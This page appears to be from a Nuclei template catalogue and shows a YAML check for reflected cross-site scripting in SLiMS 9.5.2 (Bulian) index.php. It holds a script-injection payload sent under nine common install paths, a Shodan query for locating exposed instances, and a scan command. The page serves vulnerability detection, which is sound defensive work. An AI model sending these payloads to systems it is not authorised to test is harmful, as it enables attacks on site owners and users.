Skip to content

Senayan Library Management System v9.5.2 (Bulian) - Cross-Site Scripting

ID: slims-9-xss-index

Severity: medium

Author: nblirwn

Tags: senayan,xss,slims

SLiMS 9.5.2 (Bulian) vulnerable to Cross-Site Scripting in index.php. When injected, website will execute the payload repeatedly

id: slims-9-xss-index
info:
name: Senayan Library Management System v9.5.2 (Bulian) - Cross-Site Scripting
author: nblirwn
severity: medium
description: |
SLiMS 9.5.2 (Bulian) vulnerable to Cross-Site Scripting in index.php. When injected, website will execute the payload repeatedly
reference:
- https://github.com/slims/slims9_bulian/issues/185
metadata:
verified: true
max-request: 8
vendor: slims
product: senayan_library_management_system
shodan-query: html:'content="SLIMS'
tags: senayan,xss,slims
http:
- method: GET
path:
- "{{BaseURL}}/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
- "{{BaseURL}}/perpustakaan/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
- "{{BaseURL}}/slims/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
- "{{BaseURL}}/perpustakaan/slims/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
- "{{BaseURL}}/e-library/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
- "{{BaseURL}}/perpus/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
- "{{BaseURL}}/digilib/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
- "{{BaseURL}}/bulian/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
- "{{BaseURL}}/library/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert(document.domain)</script>'
- 'SLiMS'
- 'name="author'
condition: and
- type: word
part: content_type
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022100b2a9abf4d9b883fe91230c84cc3e9f4116f613d7126b669645deb47de0958414022042be6b3e9b89572fe181da9200c042fa4165852227deccffb5df611a288a17f8:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/slims-9-xss-index.yaml"

View on Github